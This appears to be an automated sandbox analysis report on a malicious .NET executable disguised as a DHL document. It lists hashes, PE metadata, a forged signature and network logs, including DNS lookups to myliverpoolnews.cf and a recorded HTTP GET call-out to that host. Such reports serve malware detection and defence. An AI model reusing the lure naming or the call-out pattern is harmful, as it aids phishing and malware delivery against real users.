SHA512:	5cd3210d136dcc6854781911960d7abeb6afcc2b22d78ac37665d68c93d7141335ebe1865db42098d7a17ab7b2c035d77b9621e814c0e0d1843b11b82d7c82e2
SSDEEP:	768:DVo9K0V0z/hpL8dKKuzVczbeso66z0Rb6eQxl8+to23I9aFhVkSdM2VhY:DOKU0Dhp7HI
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$............."...0..&..........NE... ...`....@.. ...............................x....@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x41454e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0xB5100D24 [Mon Apr 5 21:20:36 2066 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	C=nJoFgrXQzTPdCFobamCbFGsi, S=ugJbrFHXYXzAxYwLdmW, L=tPWlhWfupHIhJnTGmDqgcSgMngqMb, T=TmpZSRuhCTfUdTQeHDvrgCznFLi, E=sbpDXZhLFXQVelMKBQtCoCWHZBIaifJljVSXNqJxw, OU=ypUuAFzPdkYcTHxDESmQNWGTmvWoFh, O=FBeWkPicMFKYPgxecEZQugMaMlNpvobgCqKiwLNvyRgSujyM, CN=VJyEekrzYGBAxCWlmsVDEADMDsZEjCrzura
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	4/6/2021 5:05:50 PM 4/6/2022 5:05:50 PM
Subject Chain	C=nJoFgrXQzTPdCFobamCbFGsi, S=ugJbrFHXYXzAxYwLdmW, L=tPWlhWfupHIhJnTGmDqgcSgMngqMb, T=TmpZSRuhCTfUdTQeHDvrgCznFLi, E=sbpDXZhLFXQVelMKBQtCoCWHZBIaifJljVSXNqJxw, OU=ypUuAFzPdkYcTHxDESmQNWGTmvWoFh, O=FBeWkPicMFKYPgxecEZQugMaMlNpvobgCqKiwLNvyRgSujyM, CN=VJyEekrzYGBAxCWlmsVDEADMDsZEjCrzura
Version:	3
Thumbprint MD5:	7E7118A07E4561CED8CD7525A818DECE
Thumbprint SHA-1:	DCD0DEDFD414E04C633F7C3CCC4446A30F4F7AA2
Thumbprint SHA-256:	4B41B3F5E90D0159B0103C5346553EC48AF0ED12AEC6EC5F70D645B662E1CA4F
Serial:	009E90D56174462AF38721816128EDF317

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x144f8	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x16000	0x694	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x13200	0x1510
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x18000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x12554	0x12600	False	0.154589179422	data	5.39149685033	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x16000	0x694	0x800	False	0.35888671875	data	5.00157464436	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x18000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x160a0	0x408	data	English	United States
RT_MANIFEST	0x164a8	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
LegalCopyright	All Rights Reserved
Assembly Version	4.500.444.190
InternalName	.exe
FileVersion	4.500.444.190
CompanyName	Inc.
LegalTrademarks
Comments
ProductName
ProductVersion	4.500.444.190
FileDescription
OriginalFilename	.exe
Translation	0x0000 0x0514

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 7, 2021 08:41:28.160150051 CEST	49701	80	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.188349962 CEST	80	49701	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.188493013 CEST	49701	80	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.188834906 CEST	49701	80	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.216577053 CEST	80	49701	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.243896961 CEST	80	49701	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.273431063 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.303102970 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.303222895 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.312096119 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.341334105 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.343916893 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.343935966 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.344484091 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.353064060 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.364991903 CEST	49701	80	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.382503033 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.383575916 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.434495926 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.463597059 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.648880005 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.648893118 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.648905039 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.648916960 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.648932934 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.648968935 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.648984909 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.649015903 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.649022102 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.649080038 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.649087906 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.649458885 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.771284103 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.816143990 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.816169977 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.816291094 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.816351891 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.816366911 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.816492081 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.817029953 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.817054033 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.817315102 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.817972898 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.817995071 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.818103075 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.818142891 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.818802118 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.818813086 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.818836927 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.818922043 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.819339037 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.819454908 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.819518089 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.820223093 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.820247889 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.820296049 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.820899010 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.820919991 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.821011066 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.821496010 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.821516037 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.821990967 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.822334051 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.822355032 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.822590113 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.823010921 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.823033094 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.823229074 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.823652029 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.823714018 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.823782921 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.824558020 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.824582100 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.824636936 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.825079918 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.825108051 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.825243950 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.826030016 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.826055050 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.826133013 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.827117920 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.827145100 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.827364922 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.827399015 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.827517986 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.827681065 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.846071959 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.846106052 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.846419096 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.846438885 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.846508026 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.846529007 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.847023010 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.847121954 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.847592115 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.847986937 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.848062038 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.848229885 CEST	49703	443	192.168.2.7	172.67.150.212
Apr 7, 2021 08:41:28.848532915 CEST	443	49703	172.67.150.212	192.168.2.7
Apr 7, 2021 08:41:28.848553896 CEST	443	49703	172.67.150.212	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 7, 2021 08:41:27.363718033 CEST	53775	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:41:27.381967068 CEST	53	53775	8.8.8.8	192.168.2.7
Apr 7, 2021 08:41:28.132997990 CEST	51837	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:41:28.146778107 CEST	53	51837	8.8.8.8	192.168.2.7
Apr 7, 2021 08:41:28.238560915 CEST	55411	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:41:28.251018047 CEST	53	55411	8.8.8.8	192.168.2.7
Apr 7, 2021 08:41:28.252821922 CEST	63668	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:41:28.272315025 CEST	53	63668	8.8.8.8	192.168.2.7
Apr 7, 2021 08:41:29.804227114 CEST	54640	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:41:29.817886114 CEST	53	54640	8.8.8.8	192.168.2.7
Apr 7, 2021 08:41:36.774317026 CEST	58739	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:41:36.787868977 CEST	53	58739	8.8.8.8	192.168.2.7
Apr 7, 2021 08:41:38.001382113 CEST	60338	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:41:38.014799118 CEST	53	60338	8.8.8.8	192.168.2.7
Apr 7, 2021 08:41:43.110543966 CEST	58717	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:41:43.123287916 CEST	53	58717	8.8.8.8	192.168.2.7
Apr 7, 2021 08:41:45.655622959 CEST	59762	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:41:45.674770117 CEST	53	59762	8.8.8.8	192.168.2.7
Apr 7, 2021 08:41:46.825423002 CEST	54329	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:41:46.842077017 CEST	53	54329	8.8.8.8	192.168.2.7
Apr 7, 2021 08:41:47.810431957 CEST	58052	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:41:47.823148966 CEST	53	58052	8.8.8.8	192.168.2.7
Apr 7, 2021 08:41:48.746906996 CEST	54008	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:41:48.759470940 CEST	53	54008	8.8.8.8	192.168.2.7
Apr 7, 2021 08:41:50.547372103 CEST	59451	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:41:50.559137106 CEST	53	59451	8.8.8.8	192.168.2.7
Apr 7, 2021 08:41:54.101576090 CEST	52914	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:41:54.113373995 CEST	53	52914	8.8.8.8	192.168.2.7
Apr 7, 2021 08:41:56.009747982 CEST	64569	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:41:56.021594048 CEST	53	64569	8.8.8.8	192.168.2.7
Apr 7, 2021 08:41:58.363719940 CEST	52816	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:41:58.376369953 CEST	53	52816	8.8.8.8	192.168.2.7
Apr 7, 2021 08:41:58.746254921 CEST	50781	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:41:58.757997036 CEST	53	50781	8.8.8.8	192.168.2.7
Apr 7, 2021 08:41:59.785259962 CEST	54230	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:41:59.798676968 CEST	53	54230	8.8.8.8	192.168.2.7
Apr 7, 2021 08:42:02.022056103 CEST	54911	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:42:02.034781933 CEST	53	54911	8.8.8.8	192.168.2.7
Apr 7, 2021 08:42:03.524101019 CEST	49958	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:42:03.536688089 CEST	53	49958	8.8.8.8	192.168.2.7
Apr 7, 2021 08:42:07.443259954 CEST	50860	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:42:07.463589907 CEST	53	50860	8.8.8.8	192.168.2.7
Apr 7, 2021 08:42:07.699230909 CEST	50452	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:42:07.712536097 CEST	53	50452	8.8.8.8	192.168.2.7
Apr 7, 2021 08:42:14.660224915 CEST	59730	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:42:14.673172951 CEST	53	59730	8.8.8.8	192.168.2.7
Apr 7, 2021 08:42:14.953305960 CEST	59310	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:42:14.966717958 CEST	53	59310	8.8.8.8	192.168.2.7
Apr 7, 2021 08:42:25.994776964 CEST	51919	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:42:26.006681919 CEST	53	51919	8.8.8.8	192.168.2.7
Apr 7, 2021 08:42:26.247692108 CEST	64296	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:42:26.260994911 CEST	53	64296	8.8.8.8	192.168.2.7
Apr 7, 2021 08:42:34.060471058 CEST	56680	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:42:34.072408915 CEST	53	56680	8.8.8.8	192.168.2.7
Apr 7, 2021 08:42:34.910620928 CEST	58820	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:42:34.922450066 CEST	53	58820	8.8.8.8	192.168.2.7
Apr 7, 2021 08:42:36.367218971 CEST	60983	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:42:36.379666090 CEST	53	60983	8.8.8.8	192.168.2.7
Apr 7, 2021 08:42:57.927133083 CEST	49247	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:42:57.939702034 CEST	53	49247	8.8.8.8	192.168.2.7
Apr 7, 2021 08:43:00.440897942 CEST	52286	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:43:00.459719896 CEST	53	52286	8.8.8.8	192.168.2.7
Apr 7, 2021 08:43:01.169452906 CEST	56064	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:43:01.182163954 CEST	53	56064	8.8.8.8	192.168.2.7
Apr 7, 2021 08:43:10.612175941 CEST	63744	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:43:10.644927979 CEST	53	63744	8.8.8.8	192.168.2.7
Apr 7, 2021 08:43:12.389940023 CEST	61457	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:43:12.474983931 CEST	53	61457	8.8.8.8	192.168.2.7
Apr 7, 2021 08:43:13.967406988 CEST	58367	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:43:14.061589956 CEST	53	58367	8.8.8.8	192.168.2.7
Apr 7, 2021 08:43:14.844119072 CEST	60599	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:43:14.856858969 CEST	53	60599	8.8.8.8	192.168.2.7
Apr 7, 2021 08:43:20.354867935 CEST	59571	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:43:20.443419933 CEST	53	59571	8.8.8.8	192.168.2.7
Apr 7, 2021 08:43:22.786647081 CEST	52689	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:43:22.800195932 CEST	53	52689	8.8.8.8	192.168.2.7
Apr 7, 2021 08:43:24.368813038 CEST	50290	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:43:24.381582022 CEST	53	50290	8.8.8.8	192.168.2.7
Apr 7, 2021 08:43:25.242238045 CEST	60427	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:43:25.257447004 CEST	53	60427	8.8.8.8	192.168.2.7
Apr 7, 2021 08:43:27.914033890 CEST	56209	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:43:27.926369905 CEST	53	56209	8.8.8.8	192.168.2.7
Apr 7, 2021 08:43:30.281819105 CEST	59582	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:43:30.294220924 CEST	53	59582	8.8.8.8	192.168.2.7
Apr 7, 2021 08:43:33.509088993 CEST	60949	53	192.168.2.7	8.8.8.8
Apr 7, 2021 08:43:33.523427963 CEST	53	60949	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 7, 2021 08:41:28.132997990 CEST	192.168.2.7	8.8.8.8	0xc8d9	Standard query (0)	myliverpoolnews.cf	A (IP address)	IN (0x0001)
Apr 7, 2021 08:41:28.252821922 CEST	192.168.2.7	8.8.8.8	0xd4ac	Standard query (0)	myliverpoolnews.cf	A (IP address)	IN (0x0001)
Apr 7, 2021 08:42:07.443259954 CEST	192.168.2.7	8.8.8.8	0xdad1	Standard query (0)	myliverpoolnews.cf	A (IP address)	IN (0x0001)
Apr 7, 2021 08:42:07.699230909 CEST	192.168.2.7	8.8.8.8	0x1aff	Standard query (0)	myliverpoolnews.cf	A (IP address)	IN (0x0001)
Apr 7, 2021 08:42:14.660224915 CEST	192.168.2.7	8.8.8.8	0x5f17	Standard query (0)	myliverpoolnews.cf	A (IP address)	IN (0x0001)
Apr 7, 2021 08:42:14.953305960 CEST	192.168.2.7	8.8.8.8	0x7068	Standard query (0)	myliverpoolnews.cf	A (IP address)	IN (0x0001)
Apr 7, 2021 08:42:25.994776964 CEST	192.168.2.7	8.8.8.8	0xb748	Standard query (0)	myliverpoolnews.cf	A (IP address)	IN (0x0001)
Apr 7, 2021 08:42:26.247692108 CEST	192.168.2.7	8.8.8.8	0x35a4	Standard query (0)	myliverpoolnews.cf	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Apr 7, 2021 08:41:28.146778107 CEST	8.8.8.8	192.168.2.7	0xc8d9	No error (0)	myliverpoolnews.cf	172.67.150.212	A (IP address)	IN (0x0001)
Apr 7, 2021 08:41:28.146778107 CEST	8.8.8.8	192.168.2.7	0xc8d9	No error (0)	myliverpoolnews.cf	104.21.56.119	A (IP address)	IN (0x0001)
Apr 7, 2021 08:41:28.272315025 CEST	8.8.8.8	192.168.2.7	0xd4ac	No error (0)	myliverpoolnews.cf	172.67.150.212	A (IP address)	IN (0x0001)
Apr 7, 2021 08:41:28.272315025 CEST	8.8.8.8	192.168.2.7	0xd4ac	No error (0)	myliverpoolnews.cf	104.21.56.119	A (IP address)	IN (0x0001)
Apr 7, 2021 08:42:07.463589907 CEST	8.8.8.8	192.168.2.7	0xdad1	No error (0)	myliverpoolnews.cf	172.67.150.212	A (IP address)	IN (0x0001)
Apr 7, 2021 08:42:07.463589907 CEST	8.8.8.8	192.168.2.7	0xdad1	No error (0)	myliverpoolnews.cf	104.21.56.119	A (IP address)	IN (0x0001)
Apr 7, 2021 08:42:07.712536097 CEST	8.8.8.8	192.168.2.7	0x1aff	No error (0)	myliverpoolnews.cf	172.67.150.212	A (IP address)	IN (0x0001)
Apr 7, 2021 08:42:07.712536097 CEST	8.8.8.8	192.168.2.7	0x1aff	No error (0)	myliverpoolnews.cf	104.21.56.119	A (IP address)	IN (0x0001)
Apr 7, 2021 08:42:14.673172951 CEST	8.8.8.8	192.168.2.7	0x5f17	No error (0)	myliverpoolnews.cf	172.67.150.212	A (IP address)	IN (0x0001)
Apr 7, 2021 08:42:14.673172951 CEST	8.8.8.8	192.168.2.7	0x5f17	No error (0)	myliverpoolnews.cf	104.21.56.119	A (IP address)	IN (0x0001)
Apr 7, 2021 08:42:14.966717958 CEST	8.8.8.8	192.168.2.7	0x7068	No error (0)	myliverpoolnews.cf	172.67.150.212	A (IP address)	IN (0x0001)
Apr 7, 2021 08:42:14.966717958 CEST	8.8.8.8	192.168.2.7	0x7068	No error (0)	myliverpoolnews.cf	104.21.56.119	A (IP address)	IN (0x0001)
Apr 7, 2021 08:42:26.006681919 CEST	8.8.8.8	192.168.2.7	0xb748	No error (0)	myliverpoolnews.cf	172.67.150.212	A (IP address)	IN (0x0001)
Apr 7, 2021 08:42:26.006681919 CEST	8.8.8.8	192.168.2.7	0xb748	No error (0)	myliverpoolnews.cf	104.21.56.119	A (IP address)	IN (0x0001)
Apr 7, 2021 08:42:26.260994911 CEST	8.8.8.8	192.168.2.7	0x35a4	No error (0)	myliverpoolnews.cf	172.67.150.212	A (IP address)	IN (0x0001)
Apr 7, 2021 08:42:26.260994911 CEST	8.8.8.8	192.168.2.7	0x35a4	No error (0)	myliverpoolnews.cf	104.21.56.119	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

myliverpoolnews.cf

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49701	172.67.150.212	80	C:\Users\user\Desktop\DHL_document11022020680908911.exe

Timestamp	kBytes transferred	Direction	Data
Apr 7, 2021 08:41:28.188834906 CEST	891	OUT	GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2657AF87F290203D3CADB14A1F61B73C.html HTTP/1.1 UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 Host: myliverpoolnews.cf Connection: Keep-Alive
